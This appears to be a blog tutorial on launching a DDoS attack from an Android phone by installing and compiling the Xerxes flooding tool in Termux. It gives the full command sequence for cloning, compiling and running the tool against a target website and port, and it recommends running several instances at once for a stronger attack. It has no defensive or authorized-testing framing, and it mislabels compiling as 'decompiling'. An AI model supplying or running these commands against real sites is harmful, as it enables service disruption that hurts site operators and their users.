How to Execute a DDoS Attack on Mobile Using Xerxes via Termux

 

"How to Execute a DDoS Attack on Mobile Using Xerxes via Termux

Greetings, friends!

Welcome back to my blog. Today I'll guide you on performing a DDoS attack on mobile using Xerxes via the Termux app. We'll leverage Termux, a terminal emulator and a lightweight version of Linux.


What Is Termux:

Termux, as described on its website, is a terminal emulator and a compact Linux version compatible with smartphones. It allows running a small Linux environment on your Android device.


Basic Requirements:

1. Android device with version 5.0 (Lollipop) or above.

2. Termux app (available on the Play Store).

3. Hacker's keyboard (also available on the Play Store).

4. Patience and a sharp mind.

5. Avoid spelling mistakes.


Installation Steps:

1. Install Termux from the Play Store with your mobile data turned on.

2. Open Termux and update it using the command: pkg update

3. Upgrade Termux with the command: pkg upgrade

4. To run Xerxes in Termux, install the required packages: pkg install git

5. Install the Clang package: pkg install clang

6. Clone the Xerxes GitHub file: git clone https://github.com/zanyarjamal/xerxes.git

7. Navigate to the Xerxes directory: cd xerxes

8. Decompile the Xerxes.c file: clang xerxes.c -o xerxes


Running Xerxes:

1. Execute the DDoS attack with the command: ./xerxes www.website.com 80

2. For a stronger attack, open multiple terminals and run the command multiple times.


Precautions:

1. Ensure internet connectivity during the Xerxes installation process.

2. Avoid spelling mistakes in commands.

3. Stay calm to troubleshoot any issues in Termux.


Closing Words:

That concludes today's topic. I hope you grasp the process of installing and running the Xerxes package in Termux. If you've gained knowledge from my blog, it's an honor. Keep visiting, keep supporting.


《GOOD BYE》"


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